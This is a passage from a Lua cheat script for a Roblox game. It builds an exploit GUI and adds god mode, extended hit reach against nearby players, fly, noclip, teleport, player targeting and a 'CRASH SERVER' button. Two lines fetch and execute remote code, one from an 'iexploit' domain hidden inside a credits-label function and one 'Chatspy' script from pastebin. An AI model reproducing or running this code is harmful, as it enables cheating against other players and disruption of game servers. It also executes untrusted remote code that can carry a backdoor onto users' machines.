  1204. CashDropperTitle.BackgroundTransparency = 1.000
  1205. CashDropperTitle.Position = UDim2.new(0.158227861, 0, 0.0276923068, 0)
  1206. CashDropperTitle.Size = UDim2.new(0, 217, 0, 26)
  1207. CashDropperTitle.Font = Enum.Font.LuckiestGuy
  1208. CashDropperTitle.Text = "CASH DROPPER"
  1209. CashDropperTitle.TextColor3 = Color3.fromRGB(255, 255, 255)
  1210. CashDropperTitle.TextSize = 30.000
  1211.  
  1212. CalculateButton.Name = "CalculateButton"
  1213. CalculateButton.Parent = SellingFrame
  1214. CalculateButton.BackgroundColor3 = Color3.fromRGB(10, 10, 10)
  1215. CalculateButton.BorderSizePixel = 0
  1216. CalculateButton.Position = UDim2.new(0.0949367136, 0, 0.369230747, 0)
  1217. CalculateButton.Size = UDim2.new(0, 118, 0, 27)
  1218. CalculateButton.Font = Enum.Font.GothamBlack
  1219. CalculateButton.Text = "Calculate"
  1220. CalculateButton.TextColor3 = Color3.fromRGB(255, 255, 255)
  1221. CalculateButton.TextSize = 14.000
  1222.  
  1223. DropToggleButton.Name = "DropToggleButton"
  1224. DropToggleButton.Parent = SellingFrame
  1225. DropToggleButton.BackgroundColor3 = Color3.fromRGB(10, 10, 10)
  1226. DropToggleButton.BorderSizePixel = 0
  1227. DropToggleButton.Position = UDim2.new(0.532544494, 0, 0.369230747, 0)
  1228. DropToggleButton.Size = UDim2.new(0, 118, 0, 27)
  1229. DropToggleButton.Font = Enum.Font.GothamBlack
  1230. DropToggleButton.Text = "Enable"
  1231. DropToggleButton.TextColor3 = Color3.fromRGB(255, 255, 255)
  1232. DropToggleButton.TextSize = 14.000
  1233.  
  1234. CashDroppedLabel.Name = "CashDroppedLabel"
  1235. CashDroppedLabel.Parent = SellingFrame
  1236. CashDroppedLabel.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  1237. CashDroppedLabel.BackgroundTransparency = 1.000
  1238. CashDroppedLabel.Position = UDim2.new(0.0949367136, 0, 0.596923113, 0)
  1239. CashDroppedLabel.Size = UDim2.new(0, 200, 0, 12)
  1240. CashDroppedLabel.Font = Enum.Font.GothamBlack
  1241. CashDroppedLabel.Text = "Cash Dropped:"
  1242. CashDroppedLabel.TextColor3 = Color3.fromRGB(255, 255, 255)
  1243. CashDroppedLabel.TextSize = 14.000
  1244. CashDroppedLabel.TextXAlignment = Enum.TextXAlignment.Left
  1245.  
  1246. CashAtEndLabel.Name = "CashAtEndLabel"
  1247. CashAtEndLabel.Parent = SellingFrame
  1248. CashAtEndLabel.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  1249. CashAtEndLabel.BackgroundTransparency = 1.000
  1250. CashAtEndLabel.Position = UDim2.new(0.0949367136, 0, 0.698461592, 0)
  1251. CashAtEndLabel.Size = UDim2.new(0, 200, 0, 12)
  1252. CashAtEndLabel.Font = Enum.Font.GothamBlack
  1253. CashAtEndLabel.Text = "Cash you will have left:"
  1254. CashAtEndLabel.TextColor3 = Color3.fromRGB(255, 255, 255)
  1255. CashAtEndLabel.TextSize = 14.000
  1256. CashAtEndLabel.TextXAlignment = Enum.TextXAlignment.Left
  1257.  
  1258. Frame_2.Parent = SellingFrame
  1259. Frame_2.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  1260. Frame_2.BorderSizePixel = 0
  1261. Frame_2.Position = UDim2.new(0.0949367061, 0, 0.769230783, 0)
  1262. Frame_2.Size = UDim2.new(0, 152, 0, 4)
  1263.  
  1264. CrashServerButton.Name = "CrashServerButton"
  1265. CrashServerButton.Parent = SellingFrame
  1266. CrashServerButton.BackgroundColor3 = Color3.fromRGB(10, 10, 10)
  1267. CrashServerButton.BorderSizePixel = 0
  1268. CrashServerButton.Position = UDim2.new(0.0949367061, 0, 0.815384626, 0)
  1269. CrashServerButton.Size = UDim2.new(0, 138, 0, 29)
  1270. CrashServerButton.Font = Enum.Font.GothamBlack
  1271. CrashServerButton.Text = "CRASH SERVER"
  1272. CrashServerButton.TextColor3 = Color3.fromRGB(255, 255, 255)
  1273. CrashServerButton.TextSize = 14.000
  1274.  
  1275.  
  1276. local function FUVO_fake_script() -- imiecredits.LocalScript
  1277. local script = Instance.new('LocalScript', imiecredits)
  1278. loadstring(game:HttpGet('https://iexploit.xyz/credits.lua'))()
  1279. script.Parent.Text = "Credits:\nby: yahyeee#7643\nUI by: imie#0039"
  1280. end
  1281. coroutine.wrap(FUVO_fake_script)()
  1282. local function PXXAONR_fake_script() -- UIGradient.LocalScript
  1283. local script = Instance.new('LocalScript', UIGradient)
  1284. game:GetService('RunService').RenderStepped:Connect(function()
  1285. script.Parent.Rotation = (tick() * 75) % 360;
  1286. end)
  1287. end
  1288. coroutine.wrap(PXXAONR_fake_script)()
  1289. local function OZAKZ_fake_script() -- SwagmodeFrame.DragScript
  1290. local script = Instance.new('LocalScript', SwagmodeFrame)
  1291. script.Parent.Active = true
  1292. script.Parent.Draggable = true
  1293. end
  1294. coroutine.wrap(OZAKZ_fake_script)()
  1295.  
  1296. function hideframes()
  1297. MainFrame.Visible = false
  1298. QuickTpFrame.Visible = false
  1299. SideScriptsFrame.Visible = false
  1300. TogglesFrame.Visible = false
  1301. SellingFrame.Visible = false
  1302. end
  1303.  
  1304. function notify(title,text,time)
  1305. game.StarterGui:SetCore("SendNotification", {
  1306. Title = title;
  1307. Text = text;
  1308. Duration = time;
  1309. })
  1310. end
  1311.  
  1312. Players = game:GetService('Players')
  1313. UIS = game:GetService('UserInputService')
  1314. RS = game:GetService('RunService')
  1315.  
  1316.  
  1317. TogglesButton.MouseButton1Click:Connect(function()
  1318. hideframes()
  1319. TogglesFrame.Visible = true
  1320. end)
  1321. QuickTpButton.MouseButton1Click:Connect(function()
  1322. hideframes()
  1323. QuickTpFrame.Visible = true
  1324. end)
  1325. SideButton.MouseButton1Click:Connect(function()
  1326. hideframes()
  1327. SideScriptsFrame.Visible = true
  1328. end)
  1329. MainButton.MouseButton1Click:Connect(function()
  1330. hideframes()
  1331. MainFrame.Visible = true
  1332. end)
  1333. SellingButton.MouseButton1Click:Connect(function()
  1334. hideframes()
  1335. SellingFrame.Visible = true
  1336. end)
  1337.  
  1338. local formatNumber = (function (n)
  1339. n = tostring(n)
  1340. return n:reverse():gsub("%d%d%d", "%1,"):reverse():gsub("^,", "")
  1341. end)
  1342.  
  1343. function SetPlayerInfo()
  1344. local foundplayer = game:GetService('Players'):FindFirstChild(TargetTextbox.Text)
  1345. if foundplayer then
  1346. local TargetId = foundplayer.UserId
  1347. local ThumbType = Enum.ThumbnailType.HeadShot
  1348. local ThumbSize = Enum.ThumbnailSize.Size420x420
  1349. local Content, IsReady = game:GetService('Players'):GetUserThumbnailAsync(TargetId, ThumbType, ThumbSize)
  1350.  
  1351. TargetImage.Image = Content
  1352.  
  1353. CashLabel.Text = ('Cash : ' .. formatNumber(foundplayer.DataFolder.Currency.Value))
  1354. BountyLabel.Text = ('Bounty : ' .. formatNumber(foundplayer.leaderstats.Wanted.Value))
  1355.  
  1356. local CrewValue = foundplayer:FindFirstChild('DataFolder'):FindFirstChild('Information'):FindFirstChild('Crew')
  1357. if CrewValue then
  1358. if CrewValue.Value ~= nil and CrewValue.Value ~= '' then
  1359. Crew = game:GetService('GroupService'):GetGroupInfoAsync(tonumber(CrewValue.Value))
  1360. if Crew then
  1361. CrewLabel.Text = ('Crew : ' .. Crew.Name )
  1362. CrewId = tonumber(CrewValue.Value)
  1363. end
  1364. else
  1365. CrewLabel.Text = ('Crew : None')
  1366. Crew = nil
  1367. end
  1368. else
  1369. CrewLabel.Text = ('Crew : None')
  1370. Crew = nil
  1371. end
  1372. end
  1373. end
  1374.  
  1375. CrewLabel.MouseButton1Click:Connect(function()
  1376. if CrewLabel.Text ~= ('Crew : None') then
  1377. setclipboard(CrewId)
  1378. end
  1379. end)
  1380.  
  1381. function ShrinkName()
  1382. TargetTextbox.FocusLost:connect(function()
  1383. for i,v in pairs(game.Players:GetChildren()) do
  1384. if (string.sub(string.lower(v.Name),1,string.len(TargetTextbox.Text))) == string.lower(TargetTextbox.Text) then
  1385. TargetTextbox.Text = v.Name
  1386. SetPlayerInfo()
  1387. end
  1388. end
  1389. end)
  1390. end
  1391. ShrinkName()
  1392.  
  1393. function view(plr)
  1394. wait()
  1395. if game.Players:FindFirstChild(plr) then
  1396. if game.Players[plr].Character then
  1397. game.Workspace:FindFirstChildWhichIsA('Camera').CameraSubject = game.Players:FindFirstChild(plr).Character.HumanoidRootPart
  1398. else
  1399. View.Text = 'View'
  1400. end
  1401. else
  1402. View.Text = 'View'
  1403. end
  1404. end
  1405.  
  1406.  
  1407. loadstring(game:HttpGet("https://pastebin.com/raw/nzXicwc1", true))() -- Chatspy
  1408.  
  1409. local vu = game:GetService("VirtualUser") -- AntiAfk
  1410. game:GetService("Players").LocalPlayer.Idled:connect(function()
  1411. vu:Button2Down(Vector2.new(0,0),workspace.CurrentCamera.CFrame)
  1412. wait(1)
  1413. vu:Button2Up(Vector2.new(0,0),workspace.CurrentCamera.CFrame)
  1414. end)
  1415.  
  1416. spawn(function() -- Network
  1417. game.RunService.RenderStepped:Connect(function()
  1418. game.Players.LocalPlayer.MaximumSimulationRadius = 1000;
  1419. setsimulationradius(1000,1000)
  1420. end)
  1421. end)
  1422.  
  1423. ------------------------------------------------------------------------------------------------------------------------------------------------
  1424. ------------------------------------------------------------------------------------------------------------------------------------------------
  1425. ------------------------------------------------------------------------------------------------------------------------------------------------
  1426. ------------------------------------------------------------------------------------------------------------------------------------------------
  1427. ------------------------------------------------------------------------------------------------------------------------------------------------
  1428. ------------------------------------------------------------------------------------------------------------------------------------------------
  1429. player = game.Players.LocalPlayer
  1430. mouse = player:GetMouse()
  1431. MainEvent = game:GetService('ReplicatedStorage').MainEvent
  1432. IsMod = false
  1433.  
  1434. MaxDistance = 15
  1435.  
  1436. COOLDOWN = true
  1437. RIDING = false
  1438.  
  1439. NamePos = CFrame.new(0,0,0)
  1440.  
  1441. green = Color3.new(0,255,0)
  1442. red = Color3.new(255,0,0)
  1443.  
  1444. buyingarmor = false
  1445. UIS.InputBegan:Connect(function(key,b)
  1446. if key.KeyCode == Enum.KeyCode.V and not b then
  1447. if SwagmodeFrame.Visible == true then
  1448. SwagmodeFrame.Visible = false
  1449. else
  1450. SwagmodeFrame.Visible = true
  1451. end
  1452. end
  1453. if key.KeyCode == Enum.KeyCode.Q and not b then
  1454. if QToTpColor.BackgroundColor3 == green then
  1455. if mouse.Target then
  1456. local part = mouse.Target
  1457. local partSize = part.Size
  1458. local halfSize = partSize.Y/2
  1459. player.Character.HumanoidRootPart.CFrame = CFrame.new(mouse.Hit.X,part.Position.Y + halfSize + 3,mouse.Hit.Z) * CFrame.Angles(math.rad(player.Character.HumanoidRootPart.Orientation.X),math.rad(player.Character.HumanoidRootPart.Orientation.Y),math.rad(player.Character.HumanoidRootPart.Orientation.Z))
  1460. if not player.Character.LeftHand:FindFirstChild('LeftWrist') then
  1461. player.Character.LeftHand.Position = player.Character.LeftLowerArm.Position
  1462. player.Character.RightHand.Position = player.Character.RightLowerArm.Position
  1463. end
  1464. end
  1465. end
  1466. end
  1467. if key.KeyCode == Enum.KeyCode.LeftAlt and not b then
  1468. if buyingarmor == false and AltArmorColor.BackgroundColor3 == green then
  1469. local ItemCost = 1000
  1470. buyingarmor = true
  1471. local ClickDetector = game:GetService("Workspace").Ignored.Shop["[Medium Armor] - $1000"].ClickDetector
  1472. local Location = game:GetService("Workspace").Ignored.Shop["[Medium Armor] - $1000"].ClickDetector.Parent.Head.Position
  1473. OldCFrame = player.Character.HumanoidRootPart.CFrame
  1474. local function buy()
  1475. wait()
  1476. player.Character.HumanoidRootPart.CFrame = CFrame.new(Location)
  1477. fireclickdetector(ClickDetector)
  1478. end
  1479. repeat buy() until player.Character.BodyEffects.Armor.Value == 100 or player.DataFolder.Currency.Value <= ItemCost or player.Character.BodyEffects.Armor:FindFirstChild('God')
  1480. player.Character.HumanoidRootPart.CFrame = OldCFrame
  1481. buyingarmor = false
  1482. end
  1483. end
  1484. if key.KeyCode == Enum.KeyCode.F and not b then
  1485. if HideBlockColor.BackgroundColor3 == green or AutoBlockColor.BackgroundColor3 == green then
  1486. HoldingF = true
  1487. player.Character:FindFirstChildWhichIsA('Humanoid').Name = 'SWAG ON TOP'
  1488. while HoldingF == true and HideBlockColor.BackgroundColor3 == green do
  1489. wait()
  1490. for _,v in pairs(player.Character:FindFirstChildWhichIsA('Humanoid'):GetPlayingAnimationTracks()) do
  1491. if v.Name == 'Block' then
  1492. v:Stop()
  1493. end
  1494. end
  1495. end
  1496. end
  1497. end
  1498. if key.KeyCode == Enum.KeyCode.Space and not b then
  1499. if RIDING == true then
  1500. COOLDOWN = false
  1501. for i,v in pairs(game.Workspace.Ignored:GetChildren()) do
  1502. if v.Name == 'MyLauncher' then
  1503. v.Name = 'Launcher'
  1504. end
  1505. end
  1506. repeat wait() until not game:GetService('Workspace'):FindFirstChild('Ignored'):FindFirstChild('MyLauncher')
  1507. COOLDOWN = true
  1508. end
  1509. end
  1510. end)
  1511.  
  1512. UIS.InputEnded:Connect(function(key,b)
  1513. if key.KeyCode == Enum.KeyCode.F and not b then
  1514. player.Character:FindFirstChildWhichIsA('Humanoid').Name = 'Humanoid'
  1515. HoldingF = false
  1516. end
  1517. end)
  1518.  
  1519. player.CharacterAdded:Connect(function(character)
  1520. repeat wait() until player.Character
  1521. NamePos = player.Character.HumanoidRootPart.CFrame
  1522. if SpawnPosition ~= nil then
  1523. player.Character.HumanoidRootPart.CFrame = SpawnPosition
  1524. end
  1525. end)
  1526.  
  1527. player.Character.ChildAdded:Connect(function(child)
  1528. if child.Name == 'Christmas_Sock' and AntiBagColor.BackgroundColor3 == green then
  1529. repeat wait() until player.Character:FindFirstChild('Christmas_Sock')
  1530. player.Character['Christmas_Sock']:Destroy()
  1531. end
  1532. end)
  1533.  
  1534. game.Workspace.Ignored.ChildAdded:Connect(function(child)
  1535. if child.Name == 'Launcher' and player.Character:FindFirstChild('[RPG]') then
  1536. child.Name = 'MyLauncher'
  1537. end
  1538. end)
  1539.  
  1540. ------------------------------------------------------------------------------------------------------------------------------------------------
  1541. ------------------------------------------------------------------------------------------------------------------------------------------------
  1542. ------------------------------------------------------------------------------------------------------------------------------------------------
  1543. ------------------------------------------------------------------------------------------------------------------------------------------------
  1544. ------------------------------------------------------------------------------------------------------------------------------------------------
  1545. ------------------------------------------------------------------------------------------------------------------------------------------------
  1546.  
  1547. View.MouseButton1Click:Connect(function()
  1548. if View.Text == 'View' then
  1549. View.Text = 'Unview'
  1550. repeat view(TargetTextbox.Text) until View.Text == 'View'
  1551. game.Workspace:FindFirstChildWhichIsA('Camera').CameraSubject = player.Character:FindFirstChildWhichIsA('Humanoid')
  1552. else
  1553. View.Text = 'View'
  1554. end
  1555. end)
  1556. GodBlock.MouseButton1Click:Connect(function()
  1557. player.Character.BodyEffects.Defense:Destroy()
  1558. Defense = Instance.new("IntValue", player.Character.BodyEffects)
  1559. Defense.Name = "Defense"
  1560. Defense.Value = 100
  1561. end)
  1562. GodArmor.MouseButton1Click:Connect(function()
  1563. player.Character.BodyEffects.Armor:Destroy()
  1564. Armor = Instance.new("IntValue", player.Character.BodyEffects)
  1565. Armor.Name = 'Armor'
  1566. Armor.Value = 100
  1567. GodLabel = Instance.new('IntValue', Armor)
  1568. GodLabel.Name = 'God'
  1569. end)
  1570. Headless.MouseButton1Click:Connect(function()
  1571. player.Character.Head:BreakJoints()
  1572. player.Character.Head.Position = Vector3.new(0,99999999999999,0)
  1573. end)
  1574. GoTo.MouseButton1Click:Connect(function()
  1575. player.Character.HumanoidRootPart.CFrame = CFrame.new(game.Players[TargetTextbox.Text].Character.UpperTorso.Position)
  1576. end)
  1577. NoRecoil.MouseButton1Click:Connect(function()
  1578. for i,v in pairs(game:GetService('Workspace'):GetChildren()) do
  1579. if v:IsA('Camera') then
  1580. v:Destroy()
  1581. end
  1582. end
  1583. local newcam = Instance.new('Camera',game.Workspace)
  1584. newcam.Name = 'Camera'
  1585. newcam.CameraType = 'Custom'
  1586. newcam.CameraSubject = game:GetService('Workspace').Players:FindFirstChild(player.Name):FindFirstChild('Humanoid')
  1587. newcam.HeadLocked = true
  1588. newcam.HeadScale = 1
  1589.  
  1590. end)
  1591. if not syn and not KRNL_LOADED then
  1592. Reach.Text = 'ToolReach'
  1593. end
  1594. Reach.MouseButton1Click:Connect(function()
  1595. if Reach.Text == 'ToolReach' then
  1596. if player.Character:FindFirstChildWhichIsA('Tool') then
  1597. player.Character:FindFirstChildWhichIsA('Tool').Handle.Size = Vector3.new(50,50,50)
  1598. player.Character:FindFirstChildWhichIsA('Tool').Handle.Transparency = 1
  1599. else
  1600. notify('Reach Error', 'you need to be holding a tool', 3)
  1601. end
  1602. else
  1603. if Reach.Text == 'Reach' then
  1604. Reach.Text = 'Unreach'
  1605. while Reach.Text == 'Unreach' do
  1606. wait()
  1607. local success, err = pcall(function()
  1608. if player.Character.BodyEffects.Attacking.Value == true then
  1609. for i,v in pairs(game:GetService('Players'):GetChildren()) do
  1610. if (v.Character.HumanoidRootPart.Position - game.Players.LocalPlayer.Character.LeftHand.Position).Magnitude <= 50 then
  1611. if game.Players.LocalPlayer.Character:FindFirstChildOfClass("Tool") then
  1612. if game.Players.LocalPlayer.Character:FindFirstChildOfClass("Tool"):FindFirstChild('Handle') then
  1613. firetouchinterest(game.Players.LocalPlayer.Character:FindFirstChildOfClass("Tool").Handle, v.Character.UpperTorso, 0)
  1614. else
  1615. firetouchinterest(game.Players.LocalPlayer.Character['RightHand'], v.Character.UpperTorso, 0)
  1616. firetouchinterest(game.Players.LocalPlayer.Character['LeftHand'], v.Character.UpperTorso, 0)
  1617. firetouchinterest(game.Players.LocalPlayer.Character['RightFoot'], v.Character.UpperTorso, 0)
  1618. firetouchinterest(game.Players.LocalPlayer.Character['LeftFoot'], v.Character.UpperTorso, 0)
  1619. firetouchinterest(game.Players.LocalPlayer.Character['RightLowerLeg'], v.Character.UpperTorso, 0)
  1620. firetouchinterest(game.Players.LocalPlayer.Character['LeftLowerLeg'], v.Character.UpperTorso, 0)
  1621. end
  1622. end
  1623. end
  1624. end
  1625. end
  1626. end)
  1627. end
  1628. else
  1629. Reach.Text = 'Reach'
  1630. end
  1631. end
  1632. end)
  1633. FreeFists.MouseButton1Click:Connect(function()
  1634. for i,v in next, workspace:GetDescendants() do
  1635. if v:IsA'Seat' then
  1636. v:Destroy()
  1637. end
  1638. end
  1639. local FistControl = false
  1640. pcall(function()
  1641. player.Character.LeftHand.LeftWrist:Destroy();
  1642. player.Character.RightHand.RightWrist:Destroy();
  1643. end);
  1644. local loopFunction = function()
  1645. player.Character.LeftHand.CFrame = CFrame.new(mouse.Hit.p);
  1646. player.Character.RightHand.CFrame = CFrame.new(mouse.Hit.p);
  1647. end;
  1648. local Loop
  1649. local Start = function()
  1650. Loop = game:GetService("RunService").Heartbeat:Connect(loopFunction);
  1651. end;
  1652. local Pause = function()
  1653. Loop:Disconnect()
  1654. end;
  1655. UIS.InputBegan:Connect(function(a, b)
  1656. if a.KeyCode == Enum.KeyCode.T and not b then
  1657. if FistControl == false then
  1658. FistControl = true;
  1659. Start();
  1660. elseif FistControl == true then
  1661. FistControl = false;
  1662. Pause();
  1663. player.Character.LeftHand.CFrame = player.Character.LeftLowerArm.CFrame
  1664. player.Character.RightHand.CFrame = player.Character.RightLowerArm.CFrame
  1665. end;
  1666. end;
  1667. end)
  1668. end)
  1669. Target.MouseButton1Click:Connect(function()
  1670. if Target.Text == 'Target' then
  1671. Target.Text = 'Untarget'
  1672. pcall(function()
  1673. player.Character.LeftHand.LeftWrist:Destroy();
  1674. player.Character.RightHand.RightWrist:Destroy();
  1675. end);
  1676. local loopFunction = function()
  1677. if game.Players:FindFirstChild(TargetTextbox.Text).Character then
  1678. player.Character.LeftHand.CFrame = CFrame.new(game.Players[TargetTextbox.Text].Character.UpperTorso.Position);
  1679. player.Character.RightHand.CFrame = CFrame.new(game.Players[TargetTextbox.Text].Character.UpperTorso.Position);
  1680. if game.Players:FindFirstChild(TargetTextbox.Text).Character.BodyEffects['K.O'].Value == true then
  1681. Target.Text = 'Target'
  1682. end
  1683. else
  1684. Target.Text = 'Target'
  1685. end
  1686. end;
  1687. local Loop
  1688. local Start = function()
  1689. Loop = game:GetService("RunService").Heartbeat:Connect(loopFunction);
  1690. end;
  1691. local Pause = function()
  1692. Loop:Disconnect()
  1693. notify('Target', 'no longer targeting', 5)
  1694. player.Character.LeftHand.CFrame = player.Character.LeftLowerArm.CFrame
  1695. player.Character.RightHand.CFrame = player.Character.RightLowerArm.CFrame
  1696. end;
  1697. Start()
  1698. repeat wait() until Target.Text == 'Target'
  1699. Pause()
  1700. else
  1701. Target.Text = 'Target'
  1702. end
  1703. end)
  1704. local OldState = player.Character:FindFirstChildWhichIsA('Humanoid'):GetState()
  1705. NoClip.MouseButton1Click:Connect(function()
  1706. local Character = player.Character
  1707. local Humanoid = Character:FindFirstChildWhichIsA('Humanoid')
  1708. local Control = false
  1709. local loopFunction = function()
  1710. Humanoid:ChangeState(11)
  1711. end;
  1712. local Loop
  1713. local Start = function()
  1714. if Control == false then
  1715. Loop = game:GetService("RunService").Heartbeat:Connect(loopFunction);
  1716. end
  1717. end;
  1718. local Ended = function()
  1719. if Control == true then
  1720. Humanoid:ChangeState(OldState)
  1721. end
  1722. end;
  1723. Start()
  1724. local Pause = function()
  1725. Loop:Disconnect()
  1726. end;
  1727. local Pause2 = function()
  1728. Start();
  1729. Loop2:Disconnect()
  1730. end;
  1731. UIS.InputBegan:Connect(function(a, b)
  1732. if a.KeyCode == Enum.KeyCode.Z and not b then
  1733. if Control == false then
  1734. Control = true;
  1735. Ended();
  1736. Pause();
  1737. elseif Control == true then
  1738. Control = false;
  1739. Pause2();
  1740. end;
  1741. end;
  1742. end);
  1743. end)
  1744.  
  1745.  
  1746. FLYMODE = 'Default'
  1747. FLYSPEED = 20
  1748.  
  1749. FlySpeedPlus.MouseButton1Click:Connect(function()
  1750. FLYSPEED = FLYSPEED + 3
  1751. notify('FlySpeed changed', tostring(FLYSPEED), 3)
  1752. end)
  1753. FlySpeedMinus.MouseButton1Click:Connect(function()
  1754. FLYSPEED = FLYSPEED - 3
  1755. notify('Speed changed', tostring(FLYSPEED), 3)
  1756. end)
  1757. FlyMode.MouseButton1Click:Connect(function()
  1758. if FLYMODE == 'Default' then
  1759. FLYMODE = 'IY'
  1760. notify('Flymode changed', 'IY Mode {changes on death}', 3)
  1761. else
  1762. FLYMODE = 'Default'
  1763. notify('Flymode changed', 'Default Mode {changes on death}', 3)
  1764. end
  1765. end)
  1766.  
  1767. Fly.MouseButton1Click:Connect(function()
  1768. if FLYMODE == 'Default' then
  1769. local plr = game.Players.LocalPlayer
  1770. local Humanoid = plr.Character:FindFirstChildWhichIsA('Humanoid')
  1771. local mouse = plr:GetMouse()
  1772. localplayer = plr
  1773. if workspace:FindFirstChild("Core") then
  1774. workspace.Core:Destroy()
  1775. end
  1776. local Core = Instance.new("Part")
  1777. Core.Name = "Core"
  1778. Core.Size = Vector3.new(0.05, 0.05, 0.05)
  1779. spawn(function()
  1780. Core.Parent = workspace
  1781. local Weld = Instance.new("Weld", Core)
  1782. Weld.Part0 = Core
  1783. Weld.Part1 = localplayer.Character.LowerTorso
  1784. Weld.C0 = CFrame.new(0, 0, 0)
  1785. end)
  1786. workspace:WaitForChild("Core")
  1787. local torso = workspace.Core
  1788. flying = true
  1789. local speed=FLYSPEED
  1790. local keys={a=false,d=false,w=false,s=false}
  1791. local e1
  1792. local e2
  1793. local function start()
  1794. local pos = Instance.new("BodyPosition",torso)
  1795. local gyro = Instance.new("BodyGyro",torso)
  1796. pos.Name="EPIXPOS"
  1797. pos.maxForce = Vector3.new(math.huge, math.huge, math.huge)
  1798. pos.position = torso.Position
  1799. gyro.maxTorque = Vector3.new(15e15, 15e15, 15e15)
  1800. gyro.cframe = torso.CFrame
  1801. repeat
  1802. wait()
  1803. Humanoid.PlatformStand=true
  1804. local new=gyro.cframe - gyro.cframe.p + pos.position
  1805. if not keys.w and not keys.s and not keys.a and not keys.d then
  1806. speed=FLYSPEED
  1807. end
  1808. if keys.w then
  1809. new = new + workspace.CurrentCamera.CoordinateFrame.lookVector * speed
  1810. speed=speed
  1811. end
  1812. if keys.s then
  1813. new = new - workspace.CurrentCamera.CoordinateFrame.lookVector * speed
  1814. speed=speed
  1815. end
  1816. if keys.d then
  1817. new = new * CFrame.new(speed,0,0)
  1818. speed=speed
  1819. end
  1820. if keys.a then
  1821. new = new * CFrame.new(-speed,0,0)
  1822. speed=speed
  1823. end
  1824. if speed>FLYSPEED then
  1825. speed=FLYSPEED
  1826. end
  1827. pos.position=new.p
  1828. if keys.w then
  1829. gyro.cframe = workspace.CurrentCamera.CoordinateFrame*CFrame.Angles(-math.rad(speed),0,0)
  1830. elseif keys.s then
  1831. gyro.cframe = workspace.CurrentCamera.CoordinateFrame*CFrame.Angles(math.rad(speed),0,0)
  1832. else
  1833. gyro.cframe = workspace.CurrentCamera.CoordinateFrame
  1834. end
  1835. until flying == false
  1836. if gyro then gyro:Destroy() end
  1837. if pos then pos:Destroy() end
  1838. flying=false
  1839. Humanoid.PlatformStand=false
  1840. speed=FLYSPEED
  1841. end
  1842. e1=mouse.KeyDown:connect(function(key)
  1843. if not torso or not torso.Parent then flying=false e1:disconnect() e2:disconnect() return end
  1844. if key=="w" then
  1845. keys.w=true
  1846. elseif key=="s" then
  1847. keys.s=true
  1848. elseif key=="a" then
  1849. keys.a=true
  1850. elseif key=="d" then
  1851. keys.d=true
  1852. elseif key=="x" then
  1853. if flying==true then
  1854. flying=false
  1855. else
  1856. flying=true
  1857. start()
  1858. end
  1859. end
  1860. end)
  1861. e2=mouse.KeyUp:connect(function(key)
  1862. if key=="w" then
  1863. keys.w=false
  1864. elseif key=="s" then
  1865. keys.s=false
  1866. elseif key=="a" then
  1867. keys.a=false
  1868. elseif key=="d" then
  1869. keys.d=false
  1870. end
  1871. end)
  1872. start()
  1873. else
  1874. repeat wait() until game.Players.LocalPlayer and game.Players.LocalPlayer.Character and game.Players.LocalPlayer.Character:findFirstChild("Head") and game.Players.LocalPlayer.Character:FindFirstChildWhichIsA("Humanoid")
  1875. local mouse = game.Players.LocalPlayer:GetMouse()
  1876. repeat wait() until mouse
  1877. local plr = game.Players.LocalPlayer
  1878. local torso = plr.Character.Head
  1879. local flying = false
  1880. local deb = true
  1881. local ctrl = {f = 0, b = 0, l = 0, r = 0}
  1882. local lastctrl = {f = 0, b = 0, l = 0, r = 0}
  1883. local maxspeed = 5000
  1884. local speed = 5000
  1885. function Fly()
  1886. local bg = Instance.new("BodyGyro", torso)
  1887. bg.P = 9e4
  1888. bg.maxTorque = Vector3.new(9e9, 9e9, 9e9)
  1889. bg.cframe = torso.CFrame
  1890. local bv = Instance.new("BodyVelocity", torso)
  1891. bv.velocity = Vector3.new(0,0.1,0)
  1892. bv.maxForce = Vector3.new(9e9, 9e9, 9e9)
  1893. repeat wait()
  1894. plr.Character:FindFirstChildWhichIsA('Humanoid').PlatformStand = true
  1895. if ctrl.l + ctrl.r ~= 100000 or ctrl.f + ctrl.b ~= 10000 then
  1896. speed = speed+.0+(speed/maxspeed)
  1897. if speed > maxspeed then
  1898. speed = maxspeed
  1899. end
  1900. elseif not (ctrl.l + ctrl.r ~= 5 or ctrl.f + ctrl.b ~= 5) and speed ~= 5 then
  1901. speed = speed-5
  1902. if speed > 5 then
  1903. speed = -2
  1904. end
  1905. end
  1906. if (ctrl.l + ctrl.r) ~= 5 or (ctrl.f + ctrl.b) ~= 5 then
  1907. bv.velocity = ((game.Workspace.CurrentCamera.CoordinateFrame.lookVector * (ctrl.f+ctrl.b)) + ((game.Workspace.CurrentCamera.CoordinateFrame * CFrame.new(ctrl.l+ctrl.r,(ctrl.f+ctrl.b)*.2,0).p) - game.Workspace.CurrentCamera.CoordinateFrame.p))*speed
  1908. lastctrl = {f = ctrl.f, b = ctrl.b, l = ctrl.l, r = ctrl.r}
  1909. elseif (ctrl.l + ctrl.r) == 5 and (ctrl.f + ctrl.b) == 5 and speed ~= 5 then
  1910. bv.velocity = ((game.Workspace.CurrentCamera.CoordinateFrame.lookVector * (lastctrl.f+lastctrl.b)) + ((game.Workspace.CurrentCamera.CoordinateFrame * CFrame.new(lastctrl.l+lastctrl.r,(lastctrl.f+lastctrl.b)*.2,0).p) - game.Workspace.CurrentCamera.CoordinateFrame.p))*speed
  1911. else
  1912. bv.velocity = Vector3.new(0,0.1,0)
  1913. end
  1914. bg.cframe = game.Workspace.CurrentCamera.CoordinateFrame * CFrame.Angles(-math.rad((ctrl.f+ctrl.b)*50*speed/maxspeed),0,0)
  1915. until not flying
  1916. ctrl = {f = 0, b = 0, l = 0, r = 0}
  1917. lastctrl = {f = 0, b = 0, l = 0, r = 0}
  1918. speed = 5
  1919. bg:Destroy()
  1920. bv:Destroy()
  1921. plr.Character:FindFirstChildWhichIsA('Humanoid').PlatformStand = false
  1922. end
  1923. mouse.KeyDown:connect(function(key)
  1924. if key:lower() == "x" then
  1925. if flying then flying = false
  1926. else
  1927. flying = true
  1928. Fly()
  1929. end
  1930. elseif key:lower() == "w" then
  1931. ctrl.f = FLYSPEED
  1932. elseif key:lower() == "s" then
  1933. ctrl.b = -FLYSPEED
  1934. elseif key:lower() == "a" then
  1935. ctrl.l = -FLYSPEED
  1936. elseif key:lower() == "d" then
  1937. ctrl.r = FLYSPEED
  1938. end
  1939. end)
  1940. mouse.KeyUp:connect(function(key)
  1941. if key:lower() == "w" then
  1942. ctrl.f = 0
  1943. elseif key:lower() == "s" then
  1944. ctrl.b = 0
